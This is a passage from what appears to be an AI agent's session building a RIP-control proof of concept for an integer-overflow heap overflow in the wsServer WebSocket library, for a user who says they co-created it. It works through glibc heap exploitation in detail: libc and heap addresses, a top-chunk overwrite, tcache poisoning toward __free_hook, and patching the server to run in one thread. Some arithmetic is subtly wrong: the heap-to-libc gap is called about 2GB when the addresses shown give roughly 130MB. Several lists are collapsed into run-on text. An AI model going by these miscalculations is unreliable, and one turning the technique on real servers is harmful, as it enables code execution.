But the write loop reads one byte at a time from the socket. We can't control the wrap-around precisely because msg_idx increments by 1 each iteration. The writes would go to msg + f1sz, msg + f1sz + 1, msg + f1sz + 2, ..., up to the maximum before wrapping. That's msg + f1sz + (2^64 - frame_length) which is... well, frame_length = 2^64 - f1sz + target_wrapped_value. So msg_idx wraps after frame_length = 2^64 - f1sz + wrap iterations, at which point msg_idx = 2^64 + wrap, which wraps to wrap.
But this requires sending 2^64 - f1sz bytes to the socket. Not feasible.
OK let me take a completely different approach and think about what IS feasible.
Feasible approach: Demonstrate heap corruption, then explain the RIP control path theoretically
For the PoC, we could:
But the user wants an actual RIP control crash, not just a theoretical explanation.
Let me reconsider the fastbin approach, even with tcache issues
Actually, wait. I was wrong about not being able to fill tcache. Let me reconsider.
The echo server does:
malloc(msg_size) → msg (T1's tcache or top)ws_sendframe_bcast → malloc(header + size + 1) → response (T1's tcache or top)free(response) → T1's tcachefree(msg) → T1's tcacheFor a 97-byte message, both msg and response are 0x70 chunks. After one round-trip, tcache[5] has 2 entries.
But what about making the sizes DIFFERENT for msg and response? If msg is 0x70 but response is a DIFFERENT size, they go to different tcache bins.
The response size = 2 + msg_size + 1 = msg_size + 3. For msg_size = 97: response = malloc(100) → 0x70 chunk. Same bin.
To make them different bins:
malloc(100) → 0x70 chunkWhat if msg_size = 33? msg: malloc(33) → 0x30 chunk (request2size(33) = 48). Wait: (33+8+15)&~15 = 56&~15 = 48 = 0x30. Hmm, 0x30 is below MINSIZE of 0x20 (32)... no, 0x30 = 48 > 32. OK.
Response: malloc(36) → (36+8+15)&~15 = 59&~15 = 48 = 0x30. Same.
OK, with the echo server, msg and response are always in the same bin (because response = msg + 3 bytes of header).
What about using the onclose/onopen printf?
The onopen callback does printf("Connection opened, addr: %s, port: %s\n", cli, port). The first printf on a thread may allocate stdout's buffer (8192 bytes). This is a one-time allocation that stays.
But this doesn't help with filling tcache.
What about multiple sequential connections on the SAME thread?
When connection 1's thread exits, the thread resources (including tcache) are destroyed. But the heap memory (thread arena) persists and is reused by the next thread.
When connection 2's thread starts, it gets a new tcache. But the heap already has chunks that were in connection 1's tcache. These chunks are "freed" (their memory was given to tcache_put) but not in any bin. They're effectively leaked.
When connection 2's thread does its first malloc, the tcache is empty, so it checks fastbins (empty) then bins (empty) then top. It allocates from top. The leaked chunks from T1's tcache are wasted heap space.
BUT: if connection 2's thread frees chunks, they go to T2's tcache (empty). When T2's tcache fills up, further frees go to fastbins. These fastbin entries are in the shared arena and persist.
So the approach would be:
Wait, let me trace this more carefully.
Connection 2 handshake:
After handshake: T2's tcache has 1 entry in bins 1, 2, 7.
Connection 2 shaping message 1 (97 bytes):
Shaping message 2:
Same pattern. tcache[5] count oscillates between 0 and 2. We never get past 2.
This confirms that on a single connection, tcache for any given bin maxes out at 2 entries.
What about opening multiple connections simultaneously?
If we open connections 1, 2, 3, 4 simultaneously (or in rapid succession), each gets its own thread. They all operate independently.
What if we have all of them send shaping messages and then close? Each thread's tcache leaks. Then the next connection gets a fresh tcache.
This doesn't help accumulate tcache entries or fastbin entries.
Wait, what about having multiple concurrent connections?
If we have connection 1 (thread T1) and connection 2 (thread T2) open simultaneously:
But T1 and T2 have different tcaches. T1's overflow corrupts T1's tcache entries. T2 can't see them.
Unless T1 and T2 share the same arena, and we can corrupt fastbins. But we can't get chunks into fastbins.
Hmm, what if we corrupt the arena's malloc_state directly?
The arena's malloc_state contains bins, fastbins, top, etc. If we can locate it and overwrite it with the overflow, we can redirect allocations.
The thread arena's malloc_state is typically at the start of the heap segment. For thread arenas created via mmap, the malloc_state is at the beginning of the mmap'd region.
If the malloc_state is BEFORE our overflow buffer (which it should be, since it's allocated first), we can't reach it with a forward overflow.
I think we need to find a way to make the exploit work on a single thread, without needing subsequent mallocs.
The only code executed after the overflow on the same thread is:
free(fsd.msg_data) at line 1713onclose callbackclose_clientIf we can make free(fsd.msg_data) trigger __free_hook, we win. For that, __free_hook needs to be non-NULL. But we haven't written to __free_hook yet.
Unless... we write to __free_hook DURING the overflow. If our overflow data reaches __free_hook, we set it to a function pointer, and then free(msg_data) calls it.
But __free_hook is in libc's BSS, far from the heap. Our overflow goes forward in the heap, not to arbitrary addresses.
What about a partial overwrite of a heap address to redirect it to __free_hook?
If we can overwrite a heap variable that contains a function pointer... but the heap doesn't typically contain function pointers (that's more of a C++ vtable thing).
OK, I think I need to accept the limitations and go with the simplest possible PoC.
Let me reconsider the approach where we DO get RIP control but through a slightly different mechanism.
Approach: Corrupt the msg buffer itself to cause a crash at a controlled address
After the overflow, free(msg_data) is called. If the msg chunk's metadata is corrupted (e.g., its size field), free() may crash in a way that reveals control.
But our overflow goes FORWARD from msg. The chunk metadata is at msg-16 (before msg). We don't corrupt it.
What about corrupting the next chunk's metadata so that when free(msg) triggers consolidation with the next chunk, it crashes?
Actually, free(msg) goes to tcache first (if room). tcache_put doesn't check the next chunk. So no crash from next-chunk metadata corruption.
But what if tcache is full for this bin? Then free(msg) goes to _int_free, which DOES check the next chunk's size. If we've corrupted the next chunk's size to an invalid value, _int_free will abort with "corrupted size vs. prev_size while consolidating" or similar.
But this gives an abort at a glibc assertion, not RIP control. And we can't fill tcache for this bin.
Actually, let me reconsider. Can we fill tcache for the exploit buffer's bin?
The exploit buffer is allocated by read_single_frame as realloc(NULL, f1sz) = malloc(f1sz). This happens ONCE for the exploit. Before that, during shaping, the msg buffers are allocated and freed, going to tcache.
If we use f1sz = 32 (so msg is a 48-byte chunk, tcache[1]):
malloc(32) → pops from tcache[1]. count goes to 1.free(msg_data) → tcache_put. count goes back to 2.tcache[1] never exceeds 2. So free always goes to tcache, never to fastbin.
UNLESS we make the exploit frame's chunk a different size from the shaping chunks.
If shaping uses 32-byte payloads (48-byte chunks, tcache[1]) and the exploit frame uses a DIFFERENT size, then the exploit buffer goes to a different tcache bin. If that bin is empty, free goes to tcache.
Hmm, this doesn't help either.
What if we use the __free_hook trick differently?
Wait, I just had an idea. What if instead of poisoning tcache to get a chunk at __free_hook, we use the overflow to write a function pointer to a heap location that the server will later use as a callback?
The ws_connection struct has function pointers (onopen, onclose, onmessage) in the ws_server sub-struct. But these are in BSS, not on the heap.
The ws_frame_data struct is on the STACK (it's a local variable in ws_establishconnection). We can't overflow into the stack from the heap.
OK, final idea: Use the thread arena's heap to corrupt the arena header
Thread arenas on glibc 2.31 are allocated via mmap with a specific layout:
[arena header (malloc_state)] [heap chunks...] [top]
The malloc_state is at the start of the mmap'd region. Chunks come after it. If we can overflow all the way to the arena header... but it's at the BEGINNING of the heap, and our buffer is way past it. We'd need to overflow backwards.
This is not feasible.
Let me take a step back and think about what IS achievable.
Given the constraints:
What CAN we do?
The actual RIP control requires either:
For option 3: can we make free() jump to a controlled address?
On glibc 2.31, free() checks __free_hook first:
void (*hook) (void *, const void *) = atomic_forced_read (__free_hook);
if (__builtin_expect (hook != NULL, 0))
{
(*hook)(p, RETURN_ADDRESS (0));
return;
}If __free_hook is non-NULL, free() calls it. But __free_hook starts as NULL and we can't write to it from the heap.
Unless... we can find a way to make free() itself crash at a controlled RIP. For example, if the chunk being freed has a corrupted fd pointer, and tcache_put writes to e->key:
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}tcache_put writes to e->key and e->next. If e (the chunk being freed) is at a controlled address... but e is msg_data, which is a heap address. We can't control where e points.
Hmm, what about tcache->entries[tc_idx]? tcache is T1's tcache_perthread_struct. We can't corrupt it.
OK, I think the real answer here is that we need to be smarter about the heap layout.
Let me reconsider the two-connection approach, but this time focusing on what happens when T2 allocates from the arena (not tcache).
When T2's tcache is empty for a given bin, malloc checks:
If T1's overflow corrupts the TOP CHUNK's size field, then when T2 allocates from top, the corrupted size might cause issues.
Actually, that's an interesting idea! What if we corrupt the top chunk?
From the previous GDB run, the chunk after msg WAS the top chunk. If we corrupt the top chunk's size, then when T2 allocates from top:
malloc calls _int_malloc → checks bins → falls through to topsbrk or mmap.But corrupting the top chunk to what value? And how does this give us RIP control?
Actually, there's a well-known technique called House of Force: corrupt the top chunk's size to a very large value (like 0xFFFFFFFFFFFFFFFF). Then any large malloc will succeed and return an address calculated from top + requested_size. If we request a specific size, we can make malloc return an arbitrary address.
But House of Force requires:
Let me trace this:
On connection 1, overflow corrupts the top chunk's size to 0xFFFFFFFFFFFFFFFF
Connection 1's thread exits
Connection 2 starts, same arena (top chunk is still corrupted)
Connection 2's handshake: first malloc is calloc(1, 61). T2's tcache empty → top. Since top's size is huge, malloc(64) splits top and returns a chunk. But where?
victim = top (the top chunk)size = chunksize(victim) = 0xFFFFFFFFFFFFFFFFremainder_size = size - nb (nb = 0x50 for malloc(64))remainder = victim + nbSubsequent mallocs on T2 also split from the corrupted top. Eventually, the top pointer wraps around the address space...
Hmm, this doesn't directly give us a chunk at __free_hook. For that, we'd need:
&__free_hook - 0x10 (to account for chunk header)old_top (known, fixed address)&__free_hook - 0x10 - old_top - 0x10 = &__free_hook - old_top - 0x20Actually, House of Force works like this:
delta = target - old_top - chunk_headerold_top + delta = targetFor our case:
target = &__free_hook - sizeof(chunk_header) = 0x7ffff7f9de48 - 16 = 0x7ffff7f9de38old_top = address of the top chunk (known from GDB: 0x7ffff0000c60 + 0x25 aligned... wait, let me recalculate)From GDB: msg chunk at 0x7ffff0000c60, size 0x25 (which is 0x20 | PREV_INUSE | NON_MAIN_ARENA = 32 with flags). Wait, 0x25 = 37? That doesn't make sense for a chunk size.
Oh wait, I think the GDB output showed the raw chunk metadata. Let me re-read: "chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)". But 0x25 = 37, not 32. Hmm. 0x20 = 32. 0x21 = 33. 0x25 = 37.
Actually, the chunk size field includes flags in the low 3 bits: 0x25 = 0b100101. The actual size is 0x25 & ~7 = 0x20 = 32. Flags: PREV_INUSE (bit 0 = 1), NON_MAIN_ARENA (bit 2 = 1).
So the chunk is 32 bytes (user data: 16 bytes). For f1sz=16, the msg is 16 bytes, fitting exactly in a 32-byte chunk.
The next chunk (top chunk) starts at 0x7ffff0000c60 + 0x20 = 0x7ffff0000c80. From GDB, the corrupted area at 0x7ffff0000c80 had prev_size=0, size=0x21, fd=0x4141... So the top chunk was at 0x7ffff0000c80 and its size was 0x21 & ~7 = 0x20 = 32.
Wait, the top chunk should be very large (the remaining heap space). A size of 0x20 seems too small. Unless the heap was very small.
Actually, for a thread arena created via mmap, the initial heap size is typically 1MB or so. The top chunk should be large. A size of 0x20 (32 bytes) doesn't make sense for the top chunk.
Hmm, maybe the GDB output was showing the corrupted state AFTER the overflow? The original top chunk's size was overwritten by our overflow data. We wrote a fake chunk pattern with size=0x21. That's the corrupted value, not the original.
So the original top chunk was at 0x7ffff0000c80 with some large size. We overwrote it with our pattern (prev_size=0, size=0x21, fd=0x4141...).
This is perfect for House of Force!
Instead of writing a fake chunk pattern, we should write:
0xFFFFFFFFFFFFFFFF (-1 in signed)Then on the next connection (T2), we can use House of Force to get a chunk at __free_hook.
Here's the refined plan:
-1__free_hook - 16But wait, the handshake happens before we can control anything. The handshake does malloc(61), malloc(31), malloc(130). These all come from the corrupted top chunk. After the handshake, top has advanced by 64 + 48 + 144 = 256 bytes (approximately). Then we send a message whose size causes the echo's malloc to return __free_hook.
Actually, the echo response malloc is: malloc(2 + msg_size + 1). We control msg_size. We want malloc to return __free_hook.
For House of Force:
old_top + 256 (approximately)__free_hook - 16(__free_hook - 16) - top_after_handshake - 16But this size might be negative (if __free_hook is before the top). In that case, on glibc 2.31 x86_64, unsigned arithmetic wraps around, and top + huge_size wraps to the target.
Wait, but malloc checks size < remainder_size. If the top chunk's size is 0xFFFFFFFFFFFFFFFF and we request a huge size, nb = request2size(huge_size). The check is nb < remainder_size = nb < 0xFFFFFFFFFFFFFFFF. For any reasonable nb, this passes. But nb could wrap around...
Actually, the malloc code does:
if (nb < old_size) {
new_size = old_size - nb;
...
}Where old_size = 0xFFFFFFFFFFFFFFFF. For nb up to 0xFFFFFFFFFFFFFFFE, this passes. And new_size = 0xFFFFFFFFFFFFFFFF - nb.
But the new top is at old_end + nb (where old_end = old_top + old_size). With old_size = -1:
old_end = old_top + 0xFFFFFFFFFFFFFFFF = old_top - 1 (wraps around!)For the next malloc, it returns the new top. So:
To get a chunk at __free_hook:
old_top + nb1 = &__free_hook - sizeof(header)nb1 = &__free_hook - sizeof(header) - old_topThis could be a very large (or negative) value. But we need to malloc this size. The request size would be nb1 - 2*SIZE_SZ (approximately).
Hmm, but we also need to consider that the malloc for the response has to come from this specific path. Let me trace more carefully.
Actually, for House of Force, we typically do ONE large allocation to move the top to the target, then the NEXT allocation returns the target.
But in our case, the path is:
malloc(msg_size) for msg, malloc(response_size) for echo responseWe want one of these mallocs to return __free_hook. We'd need to calculate the exact distance from the current top (after handshake mallocs) to __free_hook.
This requires knowing:
&__free_hook - 16Let me calculate:
0x7ffff0000c80 (from GDB)tcache_init → malloc(576) → chunk of ~592 bytes from top
0x7ffff0000c80 + 592 = 0x7ffff0000ed0calloc(1, 61): malloc(61) → 64-byte chunk from top
0x7ffff0000ed0 + 64 = 0x7ffff0000f10base64_encode: malloc(31) → 48-byte chunk from top
0x7ffff0000f10 + 48 = 0x7ffff0000f40malloc(130): → 144-byte chunk from top
0x7ffff0000f40 + 144 = 0x7ffff0000fd0Now T2 sends a message. msg_size needs to be chosen so that the echo response malloc returns __free_hook.
Actually, let me reconsider. For House of Force, the key is to make ONE large allocation that moves the top pointer to right before __free_hook. Then the NEXT allocation returns a chunk at __free_hook.
But in our case, the first "user-controlled" malloc on T2 is the msg allocation in read_single_frame. We can make this a specific size. Then the echo response allocation follows.
If msg allocation moves top to right before __free_hook:
msg_size such that request2size(msg_size) = &__free_hook - 16 - current_topmalloc(2 + msg_size + 1) → returns chunk at __free_hookBut wait, &__free_hook - 16 - current_top might be negative (if __free_hook is before current_top). In that case, request2size would wrap around.
current_top ≈ 0x7ffff0000fd0 (from calculation above)
&__free_hook - 16 = 0x7ffff7f9de38
&__free_hook - 16 - current_top = 0x7ffff7f9de38 - 0x7ffff0000fd0 = 0x7f9dce08 ≈ 2GB
So we'd need a 2GB allocation. That's request2size(0x7f9dce08) = 0x7f9dce10. Can we send a message with this size? The msg allocation is malloc(f1sz) where f1sz is the frame 1 payload size. For a non-FIN frame, f1sz can be up to... well, the server reads from the socket using next_byte(). The maximum read per call is MESSAGE_LENGTH=2048. So the message payload is limited to 2048 bytes in practice.
Wait, no. The msg allocation is realloc(msg, *msg_idx + frame_length + is_fin). For frame 1 (non-FIN), msg_idx = 0, frame_length = f1sz, is_fin = 0. So malloc(f1sz). f1sz is the payload length in the WebSocket frame, which can be up to 2^64 in theory but limited by the socket data.
But read_single_frame reads the payload byte by byte from the socket. To fill a 2GB message, we'd need to send 2GB of data. That's not practical for a PoC.
So House of Force requires too large an allocation.
But wait - we don't need to use the msg allocation for the large jump. We can use the ECHO RESPONSE allocation.
Hmm, but we don't control the echo response's allocation directly. The echo response size is 2 + msg_size + 1. And msg_size is what we send.
The issue is the same: we need a large allocation to make the jump from the heap to libc.
OK so House of Force requires a large allocation, which we can't do through the echo server.
Revised House of Force: Use a NEGATIVE distance
What if the top chunk is BEFORE __free_hook in memory? It is: 0x7ffff0000fd0 < 0x7ffff7f9de38. The distance is positive (~2GB).
What if we go the other way? What if we make top wrap around to __free_hook?
top + 0xFFFFFFFFFFFFFFFF + 1 = top (wraps to same). top + huge_value wraps around. If top + huge_value ≡ &__free_hook (mod 2^64), then huge_value = &__free_hook - top.
huge_value = 0x7ffff7f9de38 - 0x7ffff0000fd0 = 0x7f9dce68 ≈ 2GB.
This is the same calculation. We need to malloc ~2GB. Not practical.
OK so House of Force is out because the heap and libc are too far apart.
What if the heap and libc are closer?
On some systems, the heap is near libc. But on modern Linux, the heap (via mmap for thread arenas) is at a random address (though we disabled ASLR, the addresses are still "random" in the sense that they depend on the mmap layout).
Wait, we disabled ASLR. So the addresses are deterministic. But the heap and libc are still far apart in the address space.
Let me check: thread arena heap is at 0x7ffff0000000 (from GDB: chunk at 0x7ffff0000c60). Libc is mapped at 0x7ffff7dxxxxx (from GDB: system at 0x7ffff7e01290). The distance is 0x7ffff7e01290 - 0x7ffff0000c60 = 0x7e00630 ≈ 2GB. Way too far.
OK, I think I need to accept that with this specific setup (thread arenas, far from libc), we can't directly use House of Force.
Let me reconsider the problem from scratch.
Key constraint: The echo server processes each connection in a separate thread. Each thread has its own tcache. After the overflow, the thread exits without doing any more mallocs.
Possible approaches:
For approach 2: What if we use a valid multi-frame message where the overflow happens on a MIDDLE frame, not the last one?
For example: [Frame 1: non-FIN BIN, 16 bytes] [Frame 2: non-FIN CONT, overflow] [Frame 3: FIN CONT, small]
Wait, but frame 2's write loop will try to read ~2^64 bytes and fail. Unless frame 2 has a small frame_length that still causes an overflow.
For an overflow, we need f1sz + frame_length_2 > actual_buffer_size. The buffer was allocated with realloc(NULL, f1sz) = malloc(f1sz). The chunk has request2size(f1sz) bytes of space. If f1sz + frame_length_2 > request2size(f1sz), there's an overflow.
But frame_size = f1sz + frame_length_2. For this to pass the check, frame_size ≤ 16MB. So f1sz + frame_length_2 ≤ 16MB. And for overflow: f1sz + frame_length_2 > request2size(f1sz).
request2size(f1sz) ≈ f1sz + 16 (for small f1sz). So f1sz + frame_length_2 > f1sz + 16 → frame_length_2 > 16.
Wait, this doesn't work because frame_size = f1sz + frame_length_2 is checked. If frame_length_2 > 16, then frame_size > f1sz + 16 ≈ request2size(f1sz). But frame_size ≤ 16MB, and request2size(f1sz) ≈ f1sz + 16. So we'd be overflowing by frame_length_2 - 16 bytes. This is a SMALL overflow!
But does the realloc resize the buffer? realloc(msg, msg_idx + frame_length_2 + is_fin). For frame 2 (non-FIN CONT), msg_idx = f1sz, frame_length_2 = desired, is_fin = 0. So realloc(msg, f1sz + frame_length_2). Since f1sz + frame_length_2 = frame_size ≤ 16MB, this is a legitimate realloc! It would GROW the buffer to fit. No overflow.
OH. The realloc only underflows when the SIZE wraps around due to the integer overflow. Without wrapping, it's a legitimate allocation that fits the data. The overflow only happens because the realloc size wraps to a tiny value, while the write loop uses the original (huge) frame_length.
So the integer overflow in *frame_size += frame_length is ESSENTIAL. Without it, there's no overflow. And with it, the frame_length is ~2^64, making the write loop infeasible to complete.
This means the write loop ALWAYS fails after writing some bytes (our overflow), and the thread ALWAYS errors out.
Given this fundamental constraint, let me think about what CAN be achieved.
The overflow writes some bytes past the buffer. On the same thread, the only thing that happens after is free(msg_data). We need free(msg_data) to somehow trigger RIP control.
For free(msg_data):
On T1, tcache[1] (for 48-byte chunks) has at most 2 entries. So tcache is never full. free() always goes to tcache. No crash.
What if we make the chunk size indicate a DIFFERENT bin that has a full tcache?
We can't change the chunk's size (it's before the buffer in memory).
What if we use a different f1sz that results in a larger chunk, and we've filled tcache for that bin through shaping?
If we use f1sz = 97 (0x70 chunk), and we've done 4 shaping messages of 97 bytes:
Same problem. tcache never fills past 2.
Wait, what if we use MULTIPLE DIFFERENT sizes for shaping to fill tcache for a specific bin?
Actually, the issue is that each echo round-trip produces exactly 2 frees for the same bin. We can't accumulate more.
Unless... we DON'T drain the echo responses! If we send messages faster than we read responses, the server's send buffer fills up and SEND() blocks. Then the onmessage thread is stuck in ws_sendframe_internal, holding the response buffer. The msg buffer has already been freed.
Wait, let me re-read the code:
// ws_establishconnection, line 1752
while (next_complete_frame(&wfd) >= 0)
{
if ((wfd.frame_type == WS_FR_OP_TXT ||
wfd.frame_type == WS_FR_OP_BIN) && !wfd.error)
{
client->ws_srv.evs.onmessage(...);
}
// ...
free(wfd.msg); // Line 1781onmessage is called, which does ws_sendframe_bcast → ws_sendframe_internal. In ws_sendframe_internal, the response is allocated, sent, and freed. Then control returns to onmessage, which returns. Then free(wfd.msg) is called.
If SEND blocks (because the client's recv buffer is full), the response stays allocated. The thread is blocked. Meanwhile, the next message can't be processed because we're still in onmessage.
So on a single connection, we can only have ONE outstanding response at a time. We can't accumulate free chunks.
Unless... we use BROADCAST to multiple connections! ws_sendframe_bcast sends to ALL clients on port 8080. If we have connections A, B, C all connected, a message on A triggers a broadcast to A, B, C. Each broadcast allocates ONE response buffer, sends to all, then frees it. So still only one extra allocation.
Hmm. What about ws_sendframe_bin_bcast? Same thing - one allocation per call.
OK, I'm now fairly convinced that with the current echo server architecture, we can't fill tcache beyond 2 entries per bin on a single thread, and we can't get chunks into fastbins.
But wait - what about printf?
The printf in onopen and onmessage may allocate a buffer for stdout. On the first call, printf allocates a buffer (typically 8192 bytes or the block size of the output). This is a large allocation that goes to a large bin or unsorted bin.
But this is a one-time allocation. It doesn't free or accumulate.
What about the tcache_init allocation?
When T1's first malloc triggers tcache_init, it allocates a 576-byte chunk for the tcache_perthread_struct. This is a 592-byte chunk (or similar). It's allocated once and never freed.
This doesn't help with tcache filling.
**OK, I'm going to take a completely different approach. Let me reconsider whether T1 and T2 might share the same t
Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.
ws_file).__free_hook, has safe-linking, and tcache key validation — too complex for a PoC)./* */), Doxygen for functions/structs.read_single_frame() in src/ws.c:1410-1552*frame_size += fsd->frame_length — unchecked 64-bit addition, wraps aroundif (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small valuerealloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytesfsd->frame_length, writing far past the undersized buffermsg_idx=16, frame_size=16frame_length = 0xFFFFFFFFFFFFFFF5*frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH checkrealloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation, same pointer returnedmsg[16], writing far past the 32-byte chunk boundary → heap corruption confirmed__free_hook = 0x7ffff7f9de48__malloc_hook = 0x7ffff7f9bb70system = 0x7ffff7e01290exit = 0x7ffff7df5a400x7ffff0000c60, size 0x25 (raw; actual size = 0x20 = 32 bytes, with PREV_INUSE | NON_MAIN_ARENA flags), user data at 0x7ffff0000c700x7ffff0000000+msg_idx=144 (16 + 128 = 144, matching our 128-byte overflow)0x7ffff0000c80: prev_size=0, size=0x21, fd=0x4141414141414141free(msg) goes to tcache BEFORE the next-chunk size checkOn glibc 2.31, free() checks tcache BEFORE checking the next chunk's size:
if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] < mp_.tcache_count) {
tcache_put(p, tc_idx);
return; // never reaches the corrupted next-chunk check
}This is the central unsolved problem. The most recent analysis (the interrupted reasoning block) exhaustively analyzed why the previously planned tcache poisoning strategy does NOT work:
ws_establishconnection). Connection 1 runs in thread T1, connection 2 in thread T2.tcache_perthread_struct (576 bytes, allocated as the FIRST chunk on the thread arena heap). T1's poisoned tcache is invisible to T2.malloc(msg) → onmessage → malloc(response) → free(response) → free(msg). The tcache count oscillates between 0 and 2, never reaching the capacity of 7.The interrupted analysis considered and rejected the following approaches:
__malloc_hook - 0x23 (classic 0x7f trick) — REJECTED: same tcache-filling problem0x7ffff0000000+) is ~2GB away from libc (0x7ffff7d00000+); would require a ~2GB allocation to bridge the gap, not feasible through WebSocket messagesfree(fsd.msg_data) (goes to tcache, no crash) then onclose (no mallocs) then thread exit. No subsequent mallocs on T1.Overwrite the tcache_perthread_struct of a DIFFERENT thread — T2's tcache struct doesn't exist at overflow time (allocated on T2's first malloc, after T1 exits). BUT: what if T1 and T2 are concurrent (both alive during the overflow)? If T2 is already running when T1 does the overflow, T2's tcache struct IS on the heap and potentially reachable. This requires T2 to be connected before T1 sends the exploit frames.
Use ws_sendframe_bcast to trigger malloc on T2's thread — When T1 sends a message, ws_sendframe_bcast locks a mutex and iterates clients. The malloc(response) happens on T1's thread, not T2's. But if the broadcast SEND blocks (T2's recv buffer full), T1 is stuck holding the response allocation. Not directly useful.
Overflow into T2's tcache_perthread_struct while T2 is alive — If T2 is connected and has done its first malloc (tcache initialized), its tcache struct is on the heap. If we can shape the heap so T2's tcache struct is adjacent to T1's overflow buffer, we can overwrite T2's tcache entries directly, setting entries[X] = &__free_hook and counts[X] = 1. Then T2's next malloc of that size returns &__free_hook. This is promising but requires precise heap layout control across two threads sharing one arena.
Corrupt the top chunk to cause a crash during T2's malloc — Not RIP control, but could demonstrate impact. Less interesting for the PoC.
Use a single-threaded server — If we modify the echo server to use .thread_loop = 1 and process connections sequentially in the main thread, the tcache problem disappears entirely. The main thread uses the main arena. This is the simplest solution but requires changing the test server configuration.
Use the close_client path more carefully — The close_client function destroys mutexes. If a mutex's internal state is corrupted, pthread_mutex_destroy might crash. But this is unreliable.
Target the tcache->entries array of T1's own tcache struct — Even though T1 exits after the overflow, if we could overwrite T1's tcache entries BEFORE the free(msg_data) at line 1713, then free(msg_data) would use the corrupted tcache. But free() checks tcache->entries[tc_idx] to push to, it doesn't pop from it. Overwriting entries doesn't affect tcache_put behavior (it just sets e->next = tcache->entries[tc_idx] and tcache->entries[tc_idx] = e). So corrupting entries before a free just means the freed chunk gets linked to a corrupted list — but nobody pops from that list afterward.
next_byte() which buffers up to MESSAGE_LENGTH=2048 bytes from socketread_single_frame BEFORE validate_utf8_txt is calledIn get_handshake_accept:
calloc(1, 61) → 64-byte chunk → freed to tcache[2] (as str)base64_encode(hash, 20, NULL) → malloc(31) → 48-byte chunk → returned as acceptIn get_handshake_response:
3. malloc(130) → 144-byte chunk → returned as response
4. free(accept) → 48-byte chunk to tcache[1]
In do_handshake:
5. free(response) → 144-byte chunk to tcache[7]
For a message of size S bytes:
read_single_frame: malloc(S) → chunk of size request2size(S)ws_sendframe_internal: malloc(2 + S + 1) for response (2-byte header for S≤125)free(response) then free(msg)request2size(S) = (S + 8 + 15) & ~15 on glibc 2.31 x86_64ws_connection structs are in static client_socks array (BSS), NOT on heapws_getaddress() returns pointer to client->ip (static buffer), does NOT strdupclose_client() only closes socket + destroys mutexes — no malloc/freeprintf in onopen may allocate stdout buffer once (large, ~8192 bytes, never freed)mmap, heap starts at 0x7ffff0000000 range0x7ffff7d00000 range — ~2GB from the thread arena heapAGENTS.md at repo root — compact instruction file for future agent sessionstests/Dockerfile.poc — Ubuntu 20.04 image, builds echo server with all protections disabledtests/poc_rip_control.c — Full PoC client with TCP connect, WebSocket handshake, frame builder, heap shaping, two-frame exploit, two-connection mode, configurable overflow payloadtests/poc_gdb.txt — GDB helper script with breakpoints at vulnerable codetests/poc_run.sh — Orchestration script with interactive and auto modesws-poc)The RIP control strategy is blocked. The previously planned tcache poisoning approach (from the first session's summary) was based on an incorrect assumption that tcache entries persist across threads. The deep analysis in this session conclusively showed that per-thread tcache makes cross-thread poisoning impossible with the echo server's architecture.
Option A (simplest, recommended): Change the test server to single-threaded mode
.thread_loop = 1, which processes connections sequentially in the main thread__free_hook, next malloc returns __free_hook, echo writes frame data to it, free(response) triggers __free_hook → RIP controlDockerfile.poc to build a single-threaded echo variantOption B (no server changes, more complex): Concurrent connections + cross-thread tcache struct overwrite
entries[X] with &__free_hook and counts[X] with non-zero&__free_hookOption C (no server changes, theoretical): Document the limitation
Once an approach is chosen, the implementation steps are:
poc_rip_control.c (potentially remove two-connection mode if going single-threaded)poc_gdb.txt with breakpoints to verify the exploitation chainRIP = 0xXXXXXXXXXXXX2082 or similar controlled value)AGENTS.md — repo instruction file (completed)tests/Dockerfile.poc — Docker build environment (completed, may need update for single-threaded server)tests/poc_rip_control.c — PoC client (completed, needs update for chosen exploitation strategy)tests/poc_gdb.txt — GDB helper script (completed, may need update)tests/poc_run.sh — orchestration script (completed, may need update)src/ws.c — the vulnerable file, especially:
read_single_frame): the vulnerable integer overflowframe_state_data struct): field offsetsws_frame_data struct): huge struct with frm[2048] buffernext_complete_frame): frame dispatch loop, error path at line 1713 does free(fsd.msg_data)ws_establishconnection): connection loop, onclose after error, thread per connectionws_sendframe_internal): response allocation at line 636, frame header construction (bytes 0-1 are fixed: 0x82 + length for binary FIN)next_byte): reads from socket into 2048-byte bufferdo_handshake): handshake flow, allocation/free ordersrc/handshake.c — handshake allocations: calloc(61) → 64-byte, base64_encode → malloc(31) → 48-byte, malloc(130) → 144-bytesrc/base64.c — base64_encode: malloc(len*4/3+4+len/72+1) → for SHA1 (20 bytes): malloc(31) → 48-byte chunkinclude/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8examples/echo/echo.c — target server, .thread_loop = 0 (threaded mode), onclose has no malloc, onmessage calls ws_sendframe_bcastMakefile — build system (not directly used; Dockerfile.poc uses direct gcc invocations)Ok so you can follow the Option A by setting threads to 1. We just want a PoC anyways.
Let me review the current files to build a precise plan.
Now let me check the echo server and the ws.h API for thread_loop:
Let me check how thread_loop = 1 works and how connections are processed:
continue
continue
OK, I've been deep in analysis. Here's the critical finding and the plan:
thread_loop = 1 does NOT make the server single-threaded. It only controls whether the accept loop blocks the main thread. Each connection still gets its own pthread_create in ws_accept (line 1903). Per-thread tcache is still the problem.
We need to patch ws_accept to call ws_establishconnection directly instead of spawning a thread.
With all code in one thread, there's one tcache, and it persists across connections. The attack:
Pre-connection heap setup (in main() before ws_socket()):
malloc(24) x3, then free() them in reverse order[c0, c1, c2], counts=3Connection 1 — trigger overflow:
